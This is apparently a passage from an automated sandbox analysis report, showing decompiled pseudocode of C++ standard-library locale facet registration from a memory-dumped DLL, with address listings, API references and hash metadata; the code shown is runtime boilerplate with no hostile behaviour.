																						_t372 =  *((intOrPtr*)(_t462 + 8));
																						_t436 = E6D452140( *((intOrPtr*)(_t462 + 8)), _t231);
																						__eflags = _t436;
																						if(_t436 != 0) {
																							L47:
																							E6D476A77(_t462 - 0x14);
																							return E6D490E67(_t436);
																						} else {
																							__eflags = _t447;
																							if(__eflags == 0) {
																								_push( *((intOrPtr*)(_t462 + 8)));
																								_push(_t462 - 0x10);
																								__eflags = E6D48298A(_t327, _t372, _t428, _t436, _t447, __eflags, _t466) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D451940();
																									E6D4924F4(_t462 - 0x20, 0x6d5329cc);
																									asm("int3");
																									_push(0x14);
																									E6D490E9E(0x6d4fe9a2, _t327, _t436, _t447);
																									E6D476A10(_t462 - 0x14, 0);
																									_t448 =  *0x6d53fde0; // 0x0
																									 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																									 *(_t462 - 0x10) = _t448;
																									_t244 = E6D451D10();
																									_t379 =  *((intOrPtr*)(_t462 + 8));
																									_t437 = E6D452140( *((intOrPtr*)(_t462 + 8)), _t244);
																									__eflags = _t437;
																									if(_t437 != 0) {
																										L54:
																										E6D476A77(_t462 - 0x14);
																										return E6D490E67(_t437);
																									} else {
																										__eflags = _t448;
																										if(__eflags == 0) {
																											_push( *((intOrPtr*)(_t462 + 8)));
																											_push(_t462 - 0x10);
																											__eflags = E6D4829F6(_t327, _t379, _t428, _t437, _t448, __eflags, _t466) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D451940();
																												E6D4924F4(_t462 - 0x20, 0x6d5329cc);
																												asm("int3");
																												_push(0x14);
																												E6D490E9E(0x6d4fe9a2, _t327, _t437, _t448);
																												E6D476A10(_t462 - 0x14, 0);
																												_t449 =  *0x6d53fe14; // 0x0
																												 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																												 *(_t462 - 0x10) = _t449;
																												_t257 = E6D451D10();
																												_t386 =  *((intOrPtr*)(_t462 + 8));
																												_t438 = E6D452140( *((intOrPtr*)(_t462 + 8)), _t257);
																												__eflags = _t438;
																												if(_t438 != 0) {
																													L61:
																													E6D476A77(_t462 - 0x14);
																													return E6D490E67(_t438);
																												} else {
																													__eflags = _t449;
																													if(__eflags == 0) {
																														_push( *((intOrPtr*)(_t462 + 8)));
																														_push(_t462 - 0x10);
																														__eflags = E6D482A62(_t327, _t386, _t428, _t438, _t449, __eflags, _t466) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D451940();
																															E6D4924F4(_t462 - 0x20, 0x6d5329cc);
																															asm("int3");
																															_push(0x14);
																															E6D490E9E(0x6d4fe9a2, _t327, _t438, _t449);
																															E6D476A10(_t462 - 0x14, 0);
																															_t450 =  *0x6d53fde4; // 0x0
																															 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																															 *(_t462 - 0x10) = _t450;
																															_t270 = E6D451D10();
																															_t393 =  *((intOrPtr*)(_t462 + 8));
																															_t439 = E6D452140( *((intOrPtr*)(_t462 + 8)), _t270);
																															__eflags = _t439;
																															if(_t439 != 0) {
																																L68:
																																E6D476A77(_t462 - 0x14);
																																return E6D490E67(_t439);
																															} else {
																																__eflags = _t450;
																																if(__eflags == 0) {
																																	_push( *((intOrPtr*)(_t462 + 8)));
																																	_push(_t462 - 0x10);
																																	__eflags = E6D482AC8(_t327, _t393, _t428, _t439, _t450, __eflags, _t466) - 0xffffffff;
																																	if(__eflags == 0) {
																																		_t397 = _t462 - 0x20;
																																		E6D451940();
																																		E6D4924F4(_t462 - 0x20, 0x6d5329cc);
																																		asm("int3");
																																		_push(4);
																																		E6D490E9E(0x6d4fefbc, _t327, _t439, _t450);
																																		_t451 = _t397;
																																		 *(_t462 - 0x10) = _t451;
																																		 *((intOrPtr*)(_t451 + 4)) =  *((intOrPtr*)(_t462 + 0xc));
																																		_push( *((intOrPtr*)(_t462 + 0x14)));
																																		_push( *((intOrPtr*)(_t462 + 8)));
																																		_t147 = _t462 - 4;
																																		 *_t147 =  *(_t462 - 4) & 0x00000000;
																																		__eflags =  *_t147;
																																		 *_t451 = 0x6d5041ac;
																																		 *((char*)(_t451 + 0x28)) =  *((intOrPtr*)(_t462 + 0x10));
																																		E6D4868B7(_t327, _t397, _t428, _t439, _t451,  *_t147, _t466);
																																		return E6D490E67(_t451);
																																	} else {
																																		_t439 =  *(_t462 - 0x10);
																																		 *(_t462 - 0x10) = _t439;
																																		 *(_t462 - 4) = 1;
																																		E6D478A0B(__eflags, _t439);
																																		 *0x6d5001e8();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t439 + 4))))();
																																		 *0x6d53fde4 = _t439;
																																		goto L68;
																																	}
																																} else {
																																	_t439 = _t450;
																																	goto L68;
																																}
																															}
																														} else {
																															_t438 =  *(_t462 - 0x10);
																															 *(_t462 - 0x10) = _t438;
																															 *(_t462 - 4) = 1;
																															E6D478A0B(__eflags, _t438);
																															 *0x6d5001e8();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t438 + 4))))();
																															 *0x6d53fe14 = _t438;
																															goto L61;
																														}
																													} else {
																														_t438 = _t449;
																														goto L61;
																													}
																												}
																											} else {
																												_t437 =  *(_t462 - 0x10);
																												 *(_t462 - 0x10) = _t437;
																												 *(_t462 - 4) = 1;
																												E6D478A0B(__eflags, _t437);
																												 *0x6d5001e8();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t437 + 4))))();
																												 *0x6d53fde0 = _t437;
																												goto L54;
																											}
																										} else {
																											_t437 = _t448;
																											goto L54;
																										}
																									}
																								} else {
																									_t436 =  *(_t462 - 0x10);
																									 *(_t462 - 0x10) = _t436;
																									 *(_t462 - 4) = 1;
																									E6D478A0B(__eflags, _t436);
																									 *0x6d5001e8();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t436 + 4))))();
																									 *0x6d53fe10 = _t436;
																									goto L47;
																								}
																							} else {
																								_t436 = _t447;
																								goto L47;
																							}
																						}
																					} else {
																						_t435 =  *(_t462 - 0x10);
																						 *(_t462 - 0x10) = _t435;
																						 *(_t462 - 4) = 1;
																						E6D478A0B(__eflags, _t435);
																						 *0x6d5001e8();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t435 + 4))))();
																						 *0x6d53fdf4 = _t435;
																						goto L40;
																					}
																				} else {
																					_t435 = _t446;
																					goto L40;
																				}
																			}
																		} else {
																			_t434 =  *(_t462 - 0x10);
																			 *(_t462 - 0x10) = _t434;
																			 *(_t462 - 4) = 1;
																			E6D478A0B(__eflags, _t434);
																			 *0x6d5001e8();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t434 + 4))))();
																			 *0x6d53fdf0 = _t434;
																			goto L33;
																		}
																	} else {
																		_t434 = _t445;
																		goto L33;
																	}
																}
															} else {
																_t433 =  *(_t462 - 0x10);
																 *(_t462 - 0x10) = _t433;
																 *(_t462 - 4) = 1;
																E6D478A0B(__eflags, _t433);
																 *0x6d5001e8();
																 *((intOrPtr*)( *((intOrPtr*)( *_t433 + 4))))();
																 *0x6d53fdc4 = _t433;
																goto L26;
															}
														} else {
															_t433 = _t444;
															goto L26;
														}
													}
												} else {
													_t432 =  *(_t462 - 0x10);
													 *(_t462 - 0x10) = _t432;
													 *(_t462 - 4) = 1;
													E6D478A0B(__eflags, _t432);
													 *0x6d5001e8();
													 *((intOrPtr*)( *((intOrPtr*)( *_t432 + 4))))();
													 *0x6d53fdec = _t432;
													goto L19;
												}
											} else {
												_t432 = _t443;
												goto L19;
											}
										}
									} else {
										_t431 =  *(_t462 - 0x10);
										 *(_t462 - 0x10) = _t431;
										 *(_t462 - 4) = 1;
										E6D478A0B(__eflags, _t431);
										 *0x6d5001e8();
										 *((intOrPtr*)( *((intOrPtr*)( *_t431 + 4))))();
										 *0x6d53fdd8 = _t431;
										goto L12;
									}
								} else {
									_t431 = _t442;
									goto L12;
								}
							}
						} else {
							_t430 =  *(_t462 - 0x10);
							 *(_t462 - 0x10) = _t430;
							 *(_t462 - 4) = 1;
							E6D478A0B(__eflags, _t430);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t430 + 4))))();
							 *0x6d53fddc = _t430;
							goto L5;
						}
					} else {
						_t430 = _t441;
						goto L5;
					}
				}
			}

0x6d480b42
0x6d480b42
0x6d480b42
0x6d480b49
0x6d480b53
0x6d480b58
0x6d480b63
0x6d480b67
0x6d480b6a
0x6d480b6f
0x6d480b73
0x6d480b78
0x6d480b7c
0x6d480bc1
0x6d480bc4
0x6d480bd0
0x6d480b7e
0x6d480b80
0x6d480b86
0x6d480b8c
0x6d480b94
0x6d480b97
0x6d480bd4
0x6d480be2
0x6d480be7
0x6d480be8
0x6d480bef
0x6d480bf9
0x6d480bfe
0x6d480c09
0x6d480c0d
0x6d480c10
0x6d480c15
0x6d480c1e
0x6d480c20
0x6d480c22
0x6d480c67
0x6d480c6a
0x6d480c76
0x6d480c24
0x6d480c24
0x6d480c26
0x6d480c2c
0x6d480c32
0x6d480c3a
0x6d480c3d
0x6d480c7a
0x6d480c88
0x6d480c8d
0x6d480c8e
0x6d480c95
0x6d480c9f
0x6d480ca4
0x6d480caf
0x6d480cb3
0x6d480cb6
0x6d480cbb
0x6d480cc4
0x6d480cc6
0x6d480cc8
0x6d480d0d
0x6d480d10
0x6d480d1c
0x6d480cca
0x6d480cca
0x6d480ccc
0x6d480cd2
0x6d480cd8
0x6d480ce0
0x6d480ce3
0x6d480d20
0x6d480d2e
0x6d480d33
0x6d480d34
0x6d480d3b
0x6d480d45
0x6d480d4a
0x6d480d55
0x6d480d59
0x6d480d5c
0x6d480d61
0x6d480d6a
0x6d480d6c
0x6d480d6e
0x6d480db3
0x6d480db6
0x6d480dc2
0x6d480d70
0x6d480d70
0x6d480d72
0x6d480d78
0x6d480d7e
0x6d480d86
0x6d480d89
0x6d480dc6
0x6d480dd4
0x6d480dd9
0x6d480dda
0x6d480de1
0x6d480deb
0x6d480df0
0x6d480dfb
0x6d480dff
0x6d480e02
0x6d480e07
0x6d480e10
0x6d480e12
0x6d480e14
0x6d480e59
0x6d480e5c
0x6d480e68
0x6d480e16
0x6d480e16
0x6d480e18
0x6d480e1e
0x6d480e24
0x6d480e2c
0x6d480e2f
0x6d480e6c
0x6d480e7a
0x6d480e7f
0x6d480e80
0x6d480e87
0x6d480e91
0x6d480e96
0x6d480ea1
0x6d480ea5
0x6d480ea8
0x6d480ead
0x6d480eb6
0x6d480eb8
0x6d480eba
0x6d480eff
0x6d480f02
0x6d480f0e
0x6d480ebc
0x6d480ebc
0x6d480ebe
0x6d480ec4
0x6d480eca
0x6d480ed2
0x6d480ed5
0x6d480f12
0x6d480f20
0x6d480f25
0x6d480f26
0x6d480f2d
0x6d480f37
0x6d480f3c
0x6d480f47
0x6d480f4b
0x6d480f4e
0x6d480f53
0x6d480f5c
0x6d480f5e
0x6d480f60
0x6d480fa5
0x6d480fa8
0x6d480fb4
0x6d480f62
0x6d480f62
0x6d480f64
0x6d480f6a
0x6d480f70
0x6d480f78
0x6d480f7b
0x6d480fb8
0x6d480fc6
0x6d480fcb
0x6d480fcc
0x6d480fd3
0x6d480fdd
0x6d480fe2
0x6d480fed
0x6d480ff1
0x6d480ff4
0x6d480ff9
0x6d481002
0x6d481004
0x6d481006
0x6d48104b
0x6d48104e
0x6d48105a
0x6d481008
0x6d481008
0x6d48100a
0x6d481010
0x6d481016
0x6d48101e
0x6d481021
0x6d48105e
0x6d48106c
0x6d481071
0x6d481072
0x6d481079
0x6d481083
0x6d481088
0x6d481093
0x6d481097
0x6d48109a
0x6d48109f
0x6d4810a8
0x6d4810aa
0x6d4810ac
0x6d4810f1
0x6d4810f4
0x6d481100
0x6d4810ae
0x6d4810ae
0x6d4810b0
0x6d4810b6
0x6d4810bc
0x6d4810c4
0x6d4810c7
0x6d481104
0x6d481112
0x6d481117
0x6d481118
0x6d48111f
0x6d481129
0x6d48112e
0x6d481139
0x6d48113d
0x6d481140
0x6d481145
0x6d48114e
0x6d481150
0x6d481152
0x6d481197
0x6d48119a
0x6d4811a6
0x6d481154
0x6d481154
0x6d481156
0x6d48115c
0x6d481162
0x6d48116a
0x6d48116d
0x6d4811a7
0x6d4811aa
0x6d4811b8
0x6d4811bd
0x6d4811be
0x6d4811c5
0x6d4811ca
0x6d4811cc
0x6d4811d2
0x6d4811d5
0x6d4811db
0x6d4811de
0x6d4811de
0x6d4811de
0x6d4811e2
0x6d4811e8
0x6d4811eb
0x6d4811f7
0x6d48116f
0x6d48116f
0x6d481172
0x6d481176
0x6d48117a
0x6d481187
0x6d48118f
0x6d481191
0x00000000
0x6d481191
0x6d481158
0x6d481158
0x00000000
0x6d481158
0x6d481156
0x6d4810c9
0x6d4810c9
0x6d4810cc
0x6d4810d0
0x6d4810d4
0x6d4810e1
0x6d4810e9
0x6d4810eb
0x00000000
0x6d4810eb
0x6d4810b2
0x6d4810b2
0x00000000
0x6d4810b2
0x6d4810b0
0x6d481023
0x6d481023
0x6d481026
0x6d48102a
0x6d48102e
0x6d48103b
0x6d481043
0x6d481045
0x00000000
0x6d481045
0x6d48100c
0x6d48100c
0x00000000
0x6d48100c
0x6d48100a
0x6d480f7d
0x6d480f7d
0x6d480f80
0x6d480f84
0x6d480f88
0x6d480f95
0x6d480f9d
0x6d480f9f
0x00000000
0x6d480f9f
0x6d480f66
0x6d480f66
0x00000000
0x6d480f66
0x6d480f64
0x6d480ed7
0x6d480ed7
0x6d480eda
0x6d480ede
0x6d480ee2
0x6d480eef
0x6d480ef7
0x6d480ef9
0x00000000
0x6d480ef9
0x6d480ec0
0x6d480ec0
0x00000000
0x6d480ec0
0x6d480ebe
0x6d480e31
0x6d480e31
0x6d480e34
0x6d480e38
0x6d480e3c
0x6d480e49
0x6d480e51
0x6d480e53
0x00000000
0x6d480e53
0x6d480e1a
0x6d480e1a
0x00000000
0x6d480e1a
0x6d480e18
0x6d480d8b
0x6d480d8b
0x6d480d8e
0x6d480d92
0x6d480d96
0x6d480da3
0x6d480dab
0x6d480dad
0x00000000
0x6d480dad
0x6d480d74
0x6d480d74
0x00000000
0x6d480d74
0x6d480d72
0x6d480ce5
0x6d480ce5
0x6d480ce8
0x6d480cec
0x6d480cf0
0x6d480cfd
0x6d480d05
0x6d480d07
0x00000000
0x6d480d07
0x6d480cce
0x6d480cce
0x00000000
0x6d480cce
0x6d480ccc
0x6d480c3f
0x6d480c3f
0x6d480c42
0x6d480c46
0x6d480c4a
0x6d480c57
0x6d480c5f
0x6d480c61
0x00000000
0x6d480c61
0x6d480c28
0x6d480c28
0x00000000
0x6d480c28
0x6d480c26
0x6d480b99
0x6d480b99
0x6d480b9c
0x6d480ba0
0x6d480ba4
0x6d480bb1
0x6d480bb9
0x6d480bbb
0x00000000
0x6d480bbb
0x6d480b82
0x6d480b82
0x00000000
0x6d480b82
0x6d480b80

APIs

__EH_prolog3.LIBCMT ref: 6D480B49
std::_Lockit::_Lockit.LIBCPMT ref: 6D480B53

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

moneypunct.LIBCPMT ref: 6D480B8D
std::_Facet_Register.LIBCPMT ref: 6D480BA4
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480BC4
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480BE2

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 810d1ae607404117a10b0460494062beab80b3eb922a760274a5e4e5a2f6c31a
Instruction ID: dcc723c190bfc79ed722ede56f5d2dfb2289a093371cb7d3842c33cdab91b612
Opcode Fuzzy Hash: 810d1ae607404117a10b0460494062beab80b3eb922a760274a5e4e5a2f6c31a
Instruction Fuzzy Hash: F2119A728041698BCF15DBA5C884EEE7775AF85368F26080DE611BB2A0DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480BE8, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6D480BE8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t139;
				signed int _t140;
				void* _t152;
				void* _t165;
				void* _t178;
				void* _t191;
				void* _t204;
				void* _t217;
				void* _t230;
				void* _t243;
				signed int _t359;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				void* _t418;
				void* _t422;

				_t387 = __edx;
				_t296 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t418 - 0x14, 0);
				_t399 =  *0x6d53fdd8; // 0x0
				 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
				 *(_t418 - 0x10) = _t399;
				_t139 = E6D451D10();
				_t299 =  *((intOrPtr*)(_t418 + 8));
				_t140 = E6D452140( *((intOrPtr*)(_t418 + 8)), _t139);
				_t389 = _t140;
				if(_t140 != 0) {
					L5:
					E6D476A77(_t418 - 0x14);
					return E6D490E67(_t389);
				} else {
					if(_t399 == 0) {
						_push( *((intOrPtr*)(_t418 + 8)));
						_push(_t418 - 0x10);
						__eflags = E6D482752(__ebx, _t299, __edx, _t389, _t399, __eflags, _t422) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t418 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t389, _t399);
							E6D476A10(_t418 - 0x14, 0);
							_t400 =  *0x6d53fdec; // 0x0
							 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
							 *(_t418 - 0x10) = _t400;
							_t152 = E6D451D10();
							_t306 =  *((intOrPtr*)(_t418 + 8));
							_t390 = E6D452140( *((intOrPtr*)(_t418 + 8)), _t152);
							__eflags = _t390;
							if(_t390 != 0) {
								L12:
								E6D476A77(_t418 - 0x14);
								return E6D490E67(_t390);
							} else {
								__eflags = _t400;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t418 + 8)));
									_push(_t418 - 0x10);
									__eflags = E6D4827D7(_t296, _t306, __edx, _t390, _t400, __eflags, _t422) - 0xffffffff;
									if(__eflags == 0) {
										E6D451940();
										E6D4924F4(_t418 - 0x20, 0x6d5329cc);
										asm("int3");
										_push(0x14);
										E6D490E9E(0x6d4fe9a2, _t296, _t390, _t400);
										E6D476A10(_t418 - 0x14, 0);
										_t401 =  *0x6d53fdc4; // 0x0
										 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
										 *(_t418 - 0x10) = _t401;
										_t165 = E6D451D10();
										_t313 =  *((intOrPtr*)(_t418 + 8));
										_t391 = E6D452140( *((intOrPtr*)(_t418 + 8)), _t165);
										__eflags = _t391;
										if(_t391 != 0) {
											L19:
											E6D476A77(_t418 - 0x14);
											return E6D490E67(_t391);
										} else {
											__eflags = _t401;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t418 + 8)));
												_push(_t418 - 0x10);
												__eflags = E6D48283F(_t296, _t313, __edx, _t391, _t401, __eflags, _t422) - 0xffffffff;
												if(__eflags == 0) {
													E6D451940();
													E6D4924F4(_t418 - 0x20, 0x6d5329cc);
													asm("int3");
													_push(0x14);
													E6D490E9E(0x6d4fe9a2, _t296, _t391, _t401);
													E6D476A10(_t418 - 0x14, 0);
													_t402 =  *0x6d53fdf0; // 0x0
													 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
													 *(_t418 - 0x10) = _t402;
													_t178 = E6D451D10();
													_t320 =  *((intOrPtr*)(_t418 + 8));
													_t392 = E6D452140( *((intOrPtr*)(_t418 + 8)), _t178);
													__eflags = _t392;
													if(_t392 != 0) {
														L26:
														E6D476A77(_t418 - 0x14);
														return E6D490E67(_t392);
													} else {
														__eflags = _t402;
														if(__eflags == 0) {
															_push( *((intOrPtr*)(_t418 + 8)));
															_push(_t418 - 0x10);
															__eflags = E6D4828A7(_t296, _t320, _t387, _t392, _t402, __eflags, _t422) - 0xffffffff;
															if(__eflags == 0) {
																E6D451940();
																E6D4924F4(_t418 - 0x20, 0x6d5329cc);
																asm("int3");
																_push(0x14);
																E6D490E9E(0x6d4fe9a2, _t296, _t392, _t402);
																E6D476A10(_t418 - 0x14, 0);
																_t403 =  *0x6d53fdf4; // 0x0
																 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																 *(_t418 - 0x10) = _t403;
																_t191 = E6D451D10();
																_t327 =  *((intOrPtr*)(_t418 + 8));
																_t393 = E6D452140( *((intOrPtr*)(_t418 + 8)), _t191);
																__eflags = _t393;
																if(_t393 != 0) {
																	L33:
																	E6D476A77(_t418 - 0x14);
																	return E6D490E67(_t393);
																} else {
																	__eflags = _t403;
																	if(__eflags == 0) {
																		_push( *((intOrPtr*)(_t418 + 8)));
																		_push(_t418 - 0x10);
																		__eflags = E6D48290F(_t296, _t327, _t387, _t393, _t403, __eflags, _t422) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D451940();
																			E6D4924F4(_t418 - 0x20, 0x6d5329cc);
																			asm("int3");
																			_push(0x14);
																			E6D490E9E(0x6d4fe9a2, _t296, _t393, _t403);
																			E6D476A10(_t418 - 0x14, 0);
																			_t404 =  *0x6d53fe10; // 0x0
																			 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																			 *(_t418 - 0x10) = _t404;
																			_t204 = E6D451D10();
																			_t334 =  *((intOrPtr*)(_t418 + 8));
																			_t394 = E6D452140( *((intOrPtr*)(_t418 + 8)), _t204);
																			__eflags = _t394;
																			if(_t394 != 0) {
																				L40:
																				E6D476A77(_t418 - 0x14);
																				return E6D490E67(_t394);
																			} else {
																				__eflags = _t404;
																				if(__eflags == 0) {
																					_push( *((intOrPtr*)(_t418 + 8)));
																					_push(_t418 - 0x10);
																					__eflags = E6D48298A(_t296, _t334, _t387, _t394, _t404, __eflags, _t422) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D451940();
																						E6D4924F4(_t418 - 0x20, 0x6d5329cc);
																						asm("int3");
																						_push(0x14);
																						E6D490E9E(0x6d4fe9a2, _t296, _t394, _t404);
																						E6D476A10(_t418 - 0x14, 0);
																						_t405 =  *0x6d53fde0; // 0x0
																						 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																						 *(_t418 - 0x10) = _t405;
																						_t217 = E6D451D10();
																						_t341 =  *((intOrPtr*)(_t418 + 8));
																						_t395 = E6D452140( *((intOrPtr*)(_t418 + 8)), _t217);
																						__eflags = _t395;
																						if(_t395 != 0) {
																							L47:
																							E6D476A77(_t418 - 0x14);
																							return E6D490E67(_t395);
																						} else {
																							__eflags = _t405;
																							if(__eflags == 0) {
																								_push( *((intOrPtr*)(_t418 + 8)));
																								_push(_t418 - 0x10);
																								__eflags = E6D4829F6(_t296, _t341, _t387, _t395, _t405, __eflags, _t422) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D451940();
																									E6D4924F4(_t418 - 0x20, 0x6d5329cc);
																									asm("int3");
																									_push(0x14);
																									E6D490E9E(0x6d4fe9a2, _t296, _t395, _t405);
																									E6D476A10(_t418 - 0x14, 0);
																									_t406 =  *0x6d53fe14; // 0x0
																									 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																									 *(_t418 - 0x10) = _t406;
																									_t230 = E6D451D10();
																									_t348 =  *((intOrPtr*)(_t418 + 8));
																									_t396 = E6D452140( *((intOrPtr*)(_t418 + 8)), _t230);
																									__eflags = _t396;
																									if(_t396 != 0) {
																										L54:
																										E6D476A77(_t418 - 0x14);
																										return E6D490E67(_t396);
																									} else {
																										__eflags = _t406;
																										if(__eflags == 0) {
																											_push( *((intOrPtr*)(_t418 + 8)));
																											_push(_t418 - 0x10);
																											__eflags = E6D482A62(_t296, _t348, _t387, _t396, _t406, __eflags, _t422) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D451940();
																												E6D4924F4(_t418 - 0x20, 0x6d5329cc);
																												asm("int3");
																												_push(0x14);
																												E6D490E9E(0x6d4fe9a2, _t296, _t396, _t406);
																												E6D476A10(_t418 - 0x14, 0);
																												_t407 =  *0x6d53fde4; // 0x0
																												 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																												 *(_t418 - 0x10) = _t407;
																												_t243 = E6D451D10();
																												_t355 =  *((intOrPtr*)(_t418 + 8));
																												_t397 = E6D452140( *((intOrPtr*)(_t418 + 8)), _t243);
																												__eflags = _t397;
																												if(_t397 != 0) {
																													L61:
																													E6D476A77(_t418 - 0x14);
																													return E6D490E67(_t397);
																												} else {
																													__eflags = _t407;
																													if(__eflags == 0) {
																														_push( *((intOrPtr*)(_t418 + 8)));
																														_push(_t418 - 0x10);
																														__eflags = E6D482AC8(_t296, _t355, _t387, _t397, _t407, __eflags, _t422) - 0xffffffff;
																														if(__eflags == 0) {
																															_t359 = _t418 - 0x20;
																															E6D451940();
																															E6D4924F4(_t418 - 0x20, 0x6d5329cc);
																															asm("int3");
																															_push(4);
																															E6D490E9E(0x6d4fefbc, _t296, _t397, _t407);
																															_t408 = _t359;
																															 *(_t418 - 0x10) = _t408;
																															 *((intOrPtr*)(_t408 + 4)) =  *((intOrPtr*)(_t418 + 0xc));
																															_push( *((intOrPtr*)(_t418 + 0x14)));
																															_push( *((intOrPtr*)(_t418 + 8)));
																															_t133 = _t418 - 4;
																															 *_t133 =  *(_t418 - 4) & 0x00000000;
																															__eflags =  *_t133;
																															 *_t408 = 0x6d5041ac;
																															 *((char*)(_t408 + 0x28)) =  *((intOrPtr*)(_t418 + 0x10));
																															E6D4868B7(_t296, _t359, _t387, _t397, _t408,  *_t133, _t422);
																															return E6D490E67(_t408);
																														} else {
																															_t397 =  *(_t418 - 0x10);
																															 *(_t418 - 0x10) = _t397;
																															 *(_t418 - 4) = 1;
																															E6D478A0B(__eflags, _t397);
																															 *0x6d5001e8();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t397 + 4))))();
																															 *0x6d53fde4 = _t397;
																															goto L61;
																														}
																													} else {
																														_t397 = _t407;
																														goto L61;
																													}
																												}
																											} else {
																												_t396 =  *(_t418 - 0x10);
																												 *(_t418 - 0x10) = _t396;
																												 *(_t418 - 4) = 1;
																												E6D478A0B(__eflags, _t396);
																												 *0x6d5001e8();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t396 + 4))))();
																												 *0x6d53fe14 = _t396;
																												goto L54;
																											}
																										} else {
																											_t396 = _t406;
																											goto L54;
																										}
																									}
																								} else {
																									_t395 =  *(_t418 - 0x10);
																									 *(_t418 - 0x10) = _t395;
																									 *(_t418 - 4) = 1;
																									E6D478A0B(__eflags, _t395);
																									 *0x6d5001e8();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t395 + 4))))();
																									 *0x6d53fde0 = _t395;
																									goto L47;
																								}
																							} else {
																								_t395 = _t405;
																								goto L47;
																							}
																						}
																					} else {
																						_t394 =  *(_t418 - 0x10);
																						 *(_t418 - 0x10) = _t394;
																						 *(_t418 - 4) = 1;
																						E6D478A0B(__eflags, _t394);
																						 *0x6d5001e8();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t394 + 4))))();
																						 *0x6d53fe10 = _t394;
																						goto L40;
																					}
																				} else {
																					_t394 = _t404;
																					goto L40;
																				}
																			}
																		} else {
																			_t393 =  *(_t418 - 0x10);
																			 *(_t418 - 0x10) = _t393;
																			 *(_t418 - 4) = 1;
																			E6D478A0B(__eflags, _t393);
																			 *0x6d5001e8();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t393 + 4))))();
																			 *0x6d53fdf4 = _t393;
																			goto L33;
																		}
																	} else {
																		_t393 = _t403;
																		goto L33;
																	}
																}
															} else {
																_t392 =  *(_t418 - 0x10);
																 *(_t418 - 0x10) = _t392;
																 *(_t418 - 4) = 1;
																E6D478A0B(__eflags, _t392);
																 *0x6d5001e8();
																 *((intOrPtr*)( *((intOrPtr*)( *_t392 + 4))))();
																 *0x6d53fdf0 = _t392;
																goto L26;
															}
														} else {
															_t392 = _t402;
															goto L26;
														}
													}
												} else {
													_t391 =  *(_t418 - 0x10);
													 *(_t418 - 0x10) = _t391;
													 *(_t418 - 4) = 1;
													E6D478A0B(__eflags, _t391);
													 *0x6d5001e8();
													 *((intOrPtr*)( *((intOrPtr*)( *_t391 + 4))))();
													 *0x6d53fdc4 = _t391;
													goto L19;
												}
											} else {
												_t391 = _t401;
												goto L19;
											}
										}
									} else {
										_t390 =  *(_t418 - 0x10);
										 *(_t418 - 0x10) = _t390;
										 *(_t418 - 4) = 1;
										E6D478A0B(__eflags, _t390);
										 *0x6d5001e8();
										 *((intOrPtr*)( *((intOrPtr*)( *_t390 + 4))))();
										 *0x6d53fdec = _t390;
										goto L12;
									}
								} else {
									_t390 = _t400;
									goto L12;
								}
							}
						} else {
							_t389 =  *(_t418 - 0x10);
							 *(_t418 - 0x10) = _t389;
